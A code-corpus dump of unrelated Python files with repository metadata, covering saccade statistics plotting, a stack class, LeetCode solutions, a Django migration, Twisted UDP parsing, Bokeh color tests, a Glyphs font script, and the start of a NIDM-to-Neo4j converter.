el = np.zeros((2, n))
el[0, :] = +(margin_left[0, :] - prob_left)
el[1, :] = -(margin_left[1, :] - prob_left)
pylab.errorbar(bin_centers, prob_left, el, None, None,
ecolor='g', label='left', capsize=8, elinewidth=1)
er = np.zeros((2, n))
er[0, :] = +(margin_right[0, :] - prob_right)
er[1, :] = -(margin_right[1, :] - prob_right)
pylab.errorbar(bin_centers, prob_right, er, None, None,
ecolor='r', label='right', capsize=8, elinewidth=1)
pylab.plot(bin_centers, prob_left, 'g-', label='left')
pylab.plot(bin_centers, prob_right, 'r-', label='right')
pylab.xlabel('axis angle (deg)')
pylab.ylabel('probability of turning')
pylab.title('Direction probability for distance in [%dcm,%dcm], %d saccades' %
(distance_min * 100, distance_max * 100, num_saccades))
pylab.plot([0, 0], [0, 1], 'k-')
pylab.axis([-180, 180, 0, 1])
pylab.legend()
r.last().add_to(f)
return r
@contract(x='array[N]', direction='array[N]',
x_bin_centers='array[K]', x_bin_size='>0')
def compute_direction_statistics(x, x_bin_centers, x_bin_size, direction,
alpha=0.01):
K = len(x_bin_centers)
t_prob_left = np.zeros(K)
t_prob_right = np.zeros(K)
t_margin_left = np.zeros((2, K))
t_margin_right = np.zeros((2, K))
for k in range(K):
bin_center = x_bin_centers[k]
inbin = np.logical_and(x <= bin_center + x_bin_size / 2,
bin_center - x_bin_size / 2 <= x)
dirs = direction[inbin]
num = len(dirs)
num_left = (dirs > 0).sum()
num_right = (dirs < 0).sum()
prob_left, prob_right, margin_left, margin_right = \
binomial_stats(num, num_left, num_right, alpha)
t_prob_left[k] = prob_left
t_prob_right[k] = prob_right
t_margin_left[:, k] = margin_left
t_margin_right[:, k] = margin_right
return dict(bin_centers=x_bin_centers,
prob_left=t_prob_left,
prob_right=t_prob_right,
margin_left=t_margin_left,
margin_right=t_margin_right)
def statistics_distance_axis_angle(saccades,
num_distance_intervals,
axis_angle_bin_interval,
axis_angle_bin_size
):
distance = saccades['distance_from_wall']
qs = np.linspace(0, 100, num_distance_intervals)
# distance_edges = np.linspace(0, 1, distance_intervals)
distance_edges = np.percentile(distance, qs.tolist())
distance_num_sections = len(distance_edges) - 1
distance_sections = []
for di in range(distance_num_sections):
distance_min = distance_edges[di]
distance_max = distance_edges[di + 1]
select = np.logical_and(distance > distance_min,
distance < distance_max)
relevant_saccades = saccades[select]
bin_centers = range(-180, 180 + axis_angle_bin_interval,
axis_angle_bin_interval)
statistics = compute_direction_statistics(
x=relevant_saccades['axis_angle'],
x_bin_centers=np.array(bin_centers),
x_bin_size=axis_angle_bin_size,
direction=relevant_saccades['sign'])
statistics['num_saccades'] = len(relevant_saccades)
statistics['distance_min'] = distance_min
statistics['distance_max'] = distance_max
distance_sections.append(statistics)
return dict(distance_edges=distance_edges,
distance_sections=distance_sections)
|
[
"andrea@cds.caltech.edu"
] |
andrea@cds.caltech.edu
|
5b3ad54a4efaa9fbbbe546322a45748b042140c1
|
39b84306510530e39eb9d4087977ddd6b2ee203e
|
/self_assesment/self_assesment2/numericalStack.py
|
9b89874d425cc431c8b4a307eabb5975ea52bfef
|
[
"MIT"
] |
permissive
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
2ff9753a02ce1d2bdb113791d308391df19cc2f6
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
refs/heads/master
| 2022-12-31T02:02:23.566697
| 2020-09-12T06:59:03
| 2020-09-12T06:59:03
| 241,184,510
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
class Stack():
    def __init__(self, val=None):
        # avoid sharing one mutable default list across all Stack instances
        self._value = [] if val is None else val
# print("Stack initialised!")
def push(self, x):
self._value.append(x)
# print ("{} is pushed into stack!!!".format(x))
return self
def pop(self):
if len(self._value) > 0:
self._value = self._value[1:]
# print ("Values popped")
else:
print ("Underflow - List is EMPTY!!!")
return self
def __len__(self):
val = 0
for i in self._value:
val += 1
return val
def is_Empty(self):
if len(self) == 0:
print ("The list is EMPTY!!!")
return True
else:
# print ("List isn't empty")
return False
def __repr__(self):
string = ""
for i in self._value:
string = string + str(i) + " "
return string
def top(self):
return self._value[0]
|
[
"sowmyamanojna@gmail.com"
] |
sowmyamanojna@gmail.com
|
9e66b3c83031a5eb2d06a77c03098a1f9a74c905
|
b332e9e5b63db27b23250ddbbb85b470ceaf92a1
|
/List/largestNumber.py
|
c4a880a23fc70378f9c187caa0e5aedc995c8561
|
[] |
no_license
|
huangketsudou/leetcode_python
|
66fcc695b0a4f94a35cc52e161ae4bfdb1138dc2
|
e983f42d245b69f9bddd9855f51ee59648a2039e
|
refs/heads/master
| 2021-08-07T23:25:45.532458
| 2020-08-23T06:15:22
| 2020-08-23T06:15:22
| 214,324,229
| 2
| 0
| null | 2020-04-12T14:40:47
| 2019-10-11T02:16:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
from typing import List
from functools import lru_cache  # needed by the memoized dp() in the second Solution below
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [[] for _ in range(target+1)]
for i in range(1, target + 1):
for j, c in enumerate(cost):
if i == c:
dp[i]=self.cmp(dp[i],[j+1]).copy()
elif i > c:
if len(dp[i - c]):
b = dp[i - c].copy()
b.append(j + 1)
dp[i] = self.cmp(dp[i], b).copy()
for i in dp:
print(i)
return ''.join(map(str,dp[-1]))
def cmp(self, a, b):
a.sort(reverse=True)
b.sort(reverse=True)
if len(a) == len(b):
return a if a > b else b
elif len(a) < len(b):
return b
else:
return a
class Solution:
#@SQRPI
def largestNumber(self, cost: List[int], tar: int) -> str:
mi = min(cost)
@lru_cache(None)
def dp(target): # target 下的最大值
if target == 0: return 0
if target < mi: return -float('inf')
res = -float('inf')
for x in range(9):
res = max(dp(target - cost[x])*10 + x + 1, res)
return res
res = dp(tar)
return str(res) if res > 0 else "0"
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [-1 for j in range(target + 1)]
dp[0] = 0
for i in range(8, -1, -1):
for j in range(cost[i], target + 1):
if dp[j - cost[i]] < 0:
continue
dp[j] = max(dp[j], dp[j - cost[i]] * 10 + (i + 1))
if dp[target] >= 0:
return str(dp[target])
else:
return '0'
k = Solution()
print(k.largestNumber([1,1,1,1,1,1,1,1,1], 5000))
|
[
"1941161938@qq.com"
] |
1941161938@qq.com
|
432f9038e0b00672bb1870647b074519e43c0350
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/homework_zero_class/lesson13/多重继承-times_3.py
|
be4ae74b66504ab6fd49cf872d6296e34b224f30
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041
| 2020-08-24T08:39:00
| 2020-08-24T08:39:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,190
|
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/3 14:45
# @Author:老萝卜
# @file:多重继承-times_3
# @Software:%{PRODUICT_NAME}多重继承-times_3.py
class A(object):
def test(self):
print("A......")
def test1(self):
print("A-test1......")
def test3(self):
print("A-test3......")
class B(object):
def test(self):
print("B......")
def test2(self):
print("B-test2......")
class C(B):
pass
# __bases__ 可以获取当前类所有的父类
print(C.__bases__)
print(B.__bases__)
# (<class '__main__.B'>,)
# (<class 'object'>,)
# Python中是支持多重继承的,也就是我们可以为一个类同时指定多个父类
# 可以在类名后的()中添加多个类,实现多重继承
# 多重继承,会使子类同时拥有多个父类,并且会获取到所有父类的方法
class C(A,B):
pass
print(C.__bases__)
# (<class '__main__.A'>, <class '__main__.B'>)
# 如果多个父类中有重名的方法,则会先去第一个父类中寻找,然后第二个,在然后第三个...
class C(B,A):
pass
c= C()
c.test()
c.test1()
c.test2()
c.test3()
# B......
# A-test1......
# B-test2......
# A-test3......
|
[
"newwxm@126.com"
] |
newwxm@126.com
|
82e34d60193e623a88db412888e04f745cbe0e2a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Classes/Onderdeel/Plantbakvorm.py
|
8e481ff412fa8be69732c95c697b72f328907b15
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.Abstracten.VegetatieElement import VegetatieElement
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.KwantWrdInKubiekeMeter import KwantWrdInKubiekeMeter
from OTLMOW.OTLModel.Datatypes.KwantWrdInVierkanteMeter import KwantWrdInVierkanteMeter
from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie
# Generated with OTLClassCreator. To modify: extend, do not edit
class Plantbakvorm(VegetatieElement, VlakGeometrie):
"""Beplanting die niet in volle grond werd aangebracht, maar in bakvorm."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
VegetatieElement.__init__(self)
VlakGeometrie.__init__(self)
self._isBereikbaar = OTLAttribuut(field=BooleanField,
naam='isBereikbaar',
label='is bereikbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isBereikbaar',
definition='Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen.',
owner=self)
self._isVerplaatsbaar = OTLAttribuut(field=BooleanField,
naam='isVerplaatsbaar',
label='is verplaatsbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isVerplaatsbaar',
definition='Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak.',
owner=self)
self._oppervlakteBak = OTLAttribuut(field=KwantWrdInVierkanteMeter,
naam='oppervlakteBak',
label='oppervlakte',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.oppervlakteBak',
definition='De afmetingen van de plantbak in vierkante meter.',
owner=self)
self._volume = OTLAttribuut(field=KwantWrdInKubiekeMeter,
naam='volume',
label='volume',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.volume',
definition='De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter.',
owner=self)
@property
def isBereikbaar(self):
"""Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen."""
return self._isBereikbaar.get_waarde()
@isBereikbaar.setter
def isBereikbaar(self, value):
self._isBereikbaar.set_waarde(value, owner=self)
@property
def isVerplaatsbaar(self):
"""Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak."""
return self._isVerplaatsbaar.get_waarde()
@isVerplaatsbaar.setter
def isVerplaatsbaar(self, value):
self._isVerplaatsbaar.set_waarde(value, owner=self)
@property
def oppervlakteBak(self):
"""De afmetingen van de plantbak in vierkante meter."""
return self._oppervlakteBak.get_waarde()
@oppervlakteBak.setter
def oppervlakteBak(self, value):
self._oppervlakteBak.set_waarde(value, owner=self)
@property
def volume(self):
"""De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter."""
return self._volume.get_waarde()
@volume.setter
def volume(self, value):
self._volume.set_waarde(value, owner=self)
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
59b4c9db05c27c7724251e295febdd0179db742e
|
24fbe6b25338a58701a70fdda1aa81ef3add5fd3
|
/blog/migrations/0001_initial.py
|
a10a14be7a20c47db9e2eb1cb1f37151cd0ad50d
|
[] |
no_license
|
jattoabdul/jatto-portfolio
|
1d9001c90423114402119119baf325a287ad0c30
|
1e2d883f7da3c6f654a0796ec22750b52653e1c1
|
refs/heads/master
| 2021-01-13T07:19:52.932401
| 2016-10-21T07:46:28
| 2016-10-21T07:46:28
| 71,542,572
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,240
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 09:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Posts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, unique=True, verbose_name='Post Title')),
('slug', models.SlugField(max_length=150, unique=True, verbose_name='URL')),
('date', models.DateField(auto_now=True)),
('time', models.TimeField(auto_now=True)),
('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
('meta_description', models.CharField(blank=True, max_length=500, verbose_name='Meta Description')),
('meta_keywords', models.CharField(blank=True, max_length=250, verbose_name='Meta Keywords')),
('body', models.TextField()),
('published', models.BooleanField(default=None)),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categories')),
],
options={
'ordering': ['-date'],
'verbose_name_plural': 'Posts',
},
),
]
|
[
"jattoade@gmail.com"
] |
jattoade@gmail.com
|
45ce2c771a4665fdafa68a6b528d542323ae5b78
|
bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0
|
/venv/Lib/site-packages/twisted/pair/rawudp.py
|
4a582b4475c57f6cd30f9db14c9c2a4319325960
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
DuaNoDo/PythonProject
|
543e153553c58e7174031b910fd6451399afcc81
|
2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c
|
refs/heads/master
| 2020-05-07T22:22:29.878944
| 2019-06-14T07:44:35
| 2019-06-14T07:44:35
| 180,941,166
| 1
| 1
| null | 2019-06-04T06:27:29
| 2019-04-12T06:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,814
|
py
|
# -*- test-case-name: twisted.pair.test.test_rawudp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of raw packet interfaces for UDP
"""
import struct
from twisted.internet import protocol
from twisted.pair import raw
from zope.interface import implementer
class UDPHeader:
def __init__(self, data):
(self.source, self.dest, self.len, self.check) \
= struct.unpack("!HHHH", data[:8])
@implementer(raw.IRawDatagramProtocol)
class RawUDPProtocol(protocol.AbstractDatagramProtocol):
def __init__(self):
self.udpProtos = {}
def addProto(self, num, proto):
if not isinstance(proto, protocol.DatagramProtocol):
raise TypeError('Added protocol must be an instance of DatagramProtocol')
if num < 0:
raise TypeError('Added protocol must be positive or zero')
if num >= 2**16:
raise TypeError('Added protocol must fit in 16 bits')
if num not in self.udpProtos:
self.udpProtos[num] = []
self.udpProtos[num].append(proto)
def datagramReceived(self,
data,
partial,
source,
dest,
protocol,
version,
ihl,
tos,
tot_len,
fragment_id,
fragment_offset,
dont_fragment,
more_fragments,
ttl):
header = UDPHeader(data)
for proto in self.udpProtos.get(header.dest, ()):
proto.datagramReceived(data[8:],
(source, header.source))
|
[
"teadone@naver.com"
] |
teadone@naver.com
|
1a89de4b58df39f71a8cdaded521bd9bcc57ad82
|
ac1fdf53359b53e183fb9b2602328595b07cf427
|
/ParlAI/parlai/agents/transformer/ranker.py
|
51cefc77cb2f438fcd95c2cf84c00a8116b011bd
|
[] |
no_license
|
Ufukdogann/MasterThesis
|
780410c5df85b789136b525bce86ba0831409233
|
b09ede1e3c88c4ac3047800f5187c671eeda18be
|
refs/heads/main
| 2023-01-24T18:09:52.285718
| 2020-11-27T16:14:29
| 2020-11-27T16:14:29
| 312,416,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f95aa8138972542126c3bcb4a212d2bf9ef9cda22d8b31711b727a63c523e699
size 335
|
[
"134679852Ufuk*"
] |
134679852Ufuk*
|
f7b744cfd5605b2aaf4cfa03f7cb316c383583ae
|
ed1e81a2325d310de7961274a06bfe6cdb7993d0
|
/basic-python/2.py
|
99f2e56af41d4bda165783ada2d9ac971743ca69
|
[] |
no_license
|
fahimkhan/python
|
ce573298adf30ca8426b74f3ab275ab7f8047a91
|
1733ad39cf214362c8a76f8996740715888d2101
|
refs/heads/master
| 2021-01-15T15:50:27.323739
| 2016-08-24T11:02:56
| 2016-08-24T11:02:56
| 20,254,607
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#! /usr/bin/python
balance = int(raw_input('Enter balance'))
annualInterestRate = .2
payment = 0
TempBalance = balance
while TempBalance > 0:
payment += 10
TempBalance = balance
for month in range (1,13):
TempBalance = (TempBalance - payment) * (1+(annualInterestRate/12))
print(TempBalance)
if TempBalance <= 0:
print str('Lowest Payment: ' + str(round(payment,2)))
break
|
[
"fahim.elex@gmail.com"
] |
fahim.elex@gmail.com
|
bb32a4488d76e23dcf13ae34a46596167e8f81c9
|
57ea54e829f2fc8fcbea29fa8e2c9a6f64d88c3b
|
/promgen/checks.py
|
881c7e4f3d32d43f2118326d8a09357b6c6a6968
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
k8stech/promgen
|
4c959003f44be6c9bd207b81f440c090a5c2f47b
|
d189d27d37016b1861e3a0e4fb6186e5008bbcd9
|
refs/heads/master
| 2022-04-14T11:58:16.221164
| 2020-04-10T01:15:59
| 2020-04-10T01:15:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
import os
import pathlib
from django.conf import settings
from django.core import checks
from promgen import models, util
@checks.register(checks.Tags.models)
def sites(app_configs, **kwargs):
if models.Site.objects.count() == 0:
yield checks.Error(
"Site not configured", hint="Missing django site configuration"
)
for site in models.Site.objects.filter(
pk=settings.SITE_ID, domain__in=["example.com"]
):
yield checks.Error(
"Site not configured", obj=site, hint="Please update from admin panel"
)
@checks.register(checks.Tags.models)
def shards(**kwargs):
if models.Shard.objects.filter(enabled=True).count() == 0:
yield checks.Warning("Missing shards", hint="Ensure some shards are enabled")
if models.Shard.objects.filter(proxy=True).count() == 0:
yield checks.Warning("No proxy shards", hint="Ensure some shards are enabled")
@checks.register("settings")
def directories(**kwargs):
for key in ["prometheus:rules", "prometheus:blackbox", "prometheus:targets"]:
try:
path = pathlib.Path(util.setting(key)).parent
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.W_OK):
yield checks.Warning("Unable to write to %s" % path)
@checks.register("settings")
def promtool(**kwargs):
try:
path = pathlib.Path(util.setting("prometheus:promtool"))
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.X_OK):
yield checks.Warning("Unable to execute file %s" % path)
|
[
"paul.traylor@linecorp.com"
] |
paul.traylor@linecorp.com
|
c958cb5a82f6c8104bc7e0444032862e11459094
|
6b63f4fc5105f3190014e1dd5685a891a74f8c63
|
/0050_desafio.py
|
5be9a03b2c845818497d762946f24cd25bcae2ca
|
[] |
no_license
|
matheuszei/Python_DesafiosCursoemvideo
|
a711c7c9c6db022cc8a16a3a1dc59afabb586105
|
5b216908dd0845ba25ee6d2e6f8b3e9419c074d2
|
refs/heads/main
| 2023-05-10T18:13:09.785651
| 2021-06-04T13:50:48
| 2021-06-04T13:50:48
| 370,851,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
#Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles
# que forem pares. Se o valor digitado for ímpar, desconsidere-o.
soma = 0
for c in range(0, 6):
n = int(input('({}) Digite um valor: '.format(c)))
if n % 2 == 0:
soma += n
print('Soma total: {}'.format(soma))
|
[
"noreply@github.com"
] |
matheuszei.noreply@github.com
|
8d92e4c3a4b1b88ae82f1dff436289a50a3edeaa
|
83d657c787529f01a8ecc8a874421738a7eecec7
|
/Components/Decompose Corner and Cap Components.py
|
1dd679598592878764a5f6a5b69a03429fbcd0da
|
[
"Apache-2.0"
] |
permissive
|
BurgAndOeden/Glyphs-Scripts
|
e31b5164b491dfe0cd2d57f6cf1422c4aadda104
|
f0195d6b8f0a6c055e4e44d5ef41ba48bdd1e3a6
|
refs/heads/master
| 2020-09-16T08:01:06.345898
| 2019-11-24T00:15:44
| 2019-11-24T00:15:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
#MenuTitle: Decompose Corner and Cap Components
# -*- coding: utf-8 -*-
__doc__="""
Recreates the current paths without caps or components.
"""
from Foundation import NSClassFromString
thisFont = Glyphs.font # frontmost font
selectedLayers = thisFont.selectedLayers # active layers of selected glyphs
removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init()
gridSize = float(thisFont.gridMain())/thisFont.gridSubDivision()
def removeCorners(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 16: # corner
thisLayer.removeObjectFromHintsAtIndex_(i)
def removeCaps(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 17: # cap
thisLayer.removeObjectFromHintsAtIndex_(i)
def process( thisLayer ):
pen = GSBezStringPen.alloc().init()
for thisPath in thisLayer.paths:
thisPath.drawInPen_(pen)
pathString = pen.charString()
newPaths = removeOverlapFilter.pathsFromBez_gridSize_(pathString,gridSize)
removeCaps(thisLayer)
removeCorners(thisLayer)
thisLayer.paths = newPaths
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in selectedLayers:
thisGlyph = thisLayer.parent
print "Processing", thisGlyph.name
thisGlyph.beginUndo() # begin undo grouping
process( thisLayer )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
1d6318d6da52ddd15efa39e18f8a38efab9c2016
|
2729fff7cb053d2577985d38c8962043ee9f853d
|
/bokeh/colors/tests/test_rgb.py
|
38a92fcdc5718cea5c5cb924d3373c70544bb3a2
|
[
"BSD-3-Clause"
] |
permissive
|
modster/bokeh
|
2c78c5051fa9cac48c8c2ae7345eafc54b426fbd
|
60fce9003aaa618751c9b8a3133c95688073ea0b
|
refs/heads/master
| 2020-03-29T01:13:35.740491
| 2018-09-18T06:08:59
| 2018-09-18T06:08:59
| 149,377,781
| 1
| 0
|
BSD-3-Clause
| 2018-09-19T02:02:49
| 2018-09-19T02:02:49
| null |
UTF-8
|
Python
| false
| false
| 4,379
|
py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.colors import HSL
# Module under test
import bokeh.colors.rgb as bcr
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_RGB(object):
def test_init(self):
c = bcr.RGB(10, 20, 30)
assert c
assert c.a == 1.0
assert c.r == 10
assert c.g == 20
assert c.b == 30
c = bcr.RGB(10, 20, 30, 0.3)
assert c
assert c.a == 0.3
assert c.r == 10
assert c.g == 20
assert c.b == 30
def test_repr(self):
c = bcr.RGB(10, 20, 30)
assert repr(c) == c.to_css()
c = bcr.RGB(10, 20, 30, 0.3)
assert repr(c) == c.to_css()
def test_copy(self):
c = bcr.RGB(10, 0.2, 0.3)
c2 = c.copy()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_from_hsl(self):
c = HSL(10, 0.1, 0.2)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 1.0
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
c = HSL(10, 0.1, 0.2, 0.3)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 0.3
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
def test_from_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_to_css(self):
c = bcr.RGB(10, 20, 30)
assert c.to_css() == "rgb(10, 20, 30)"
c = bcr.RGB(10, 20, 30, 0.3)
assert c.to_css() == "rgba(10, 20, 30, 0.3)"
def test_to_hex(self):
c = bcr.RGB(10, 20, 30)
        assert c.to_hex() == "#%02X%02X%02X" % (c.r, c.g, c.b)
def test_to_hsl(self):
c = bcr.RGB(255, 100, 0)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
c = bcr.RGB(255, 100, 0, 0.1)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
def test_to_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"noreply@github.com"
] |
modster.noreply@github.com
|
aa247b139b389b58a5500dc4c769591494b5cef3
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=35/sched.py
|
a0392c19ab7309ecc424144631532e7acfb8ce71
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
-S 2 -X RUN -Q 0 -L 1 73 250
-S 2 -X RUN -Q 0 -L 1 47 150
-S 2 -X RUN -Q 0 -L 1 39 150
-S 1 -X RUN -Q 1 -L 1 36 200
-S 1 -X RUN -Q 1 -L 1 34 150
-S 1 -X RUN -Q 1 -L 1 34 125
-S 0 -X RUN -Q 2 -L 1 32 200
-S 0 -X RUN -Q 2 -L 1 29 400
-S 0 -X RUN -Q 2 -L 1 28 125
-S 3 -X RUN -Q 3 -L 1 27 150
-S 3 -X RUN -Q 3 -L 1 27 250
-S 4 27 200
-S 5 25 300
-S 4 25 175
-S 4 21 150
-S 4 21 125
-S 4 17 125
-S 4 15 125
-S 4 13 125
-S 5 10 100
-S 5 10 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
833502e31a08a9076d125cf4da8732dc6e9093f4
|
4a3b651b892121b149406b0c11ded96dfbbbc309
|
/nidm_neo4j.py
|
50a797ccba84c66d1bd7196a27fa18d7c7e1d151
|
[] |
no_license
|
vsoch/nidm-neo4j
|
78c10f7540b4462997e57075fe55466fec2322f6
|
00c4a077e416ced19b6d3d246ac959e9a8ffb004
|
refs/heads/master
| 2021-01-10T01:36:01.665912
| 2015-10-15T20:17:46
| 2015-10-15T20:17:46
| 44,143,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
from nidmviewer.convert import get_lookups, get_nidm_keys, get_field_groups
from nidmviewer.convert import getjson
from rdflib.serializer import Serializer
from rdflib import Graph as graphrdf, plugin
import rdfextras
rdfextras.registerplugins()
plugin.register(
'json-ld',
Serializer,
'rdflib_jsonld.serializer',
'JsonLDSerializer')
import numpy
import json
import re
import os
import sys
ttl_file = sys.argv[1]
outfolder = sys.argv[2]
username = sys.argv[3]
repo_name = sys.argv[4]
if not os.path.exists(outfolder):
os.mkdir(outfolder)
ttl = getjson(ttl_file)
# create a node
def create_node(nid,node_type,uid,name,properties):
node_type = node_type.lower().replace(" ","").replace("'","").replace("-","")
name = name.replace("'","").replace("-","")
if len(properties) > 0:
property_string = ""
for p in range(len(properties)):
property_name = properties[p][0].lower().replace(" ","").replace("'","").replace("-","")
property_value = properties[p][1]
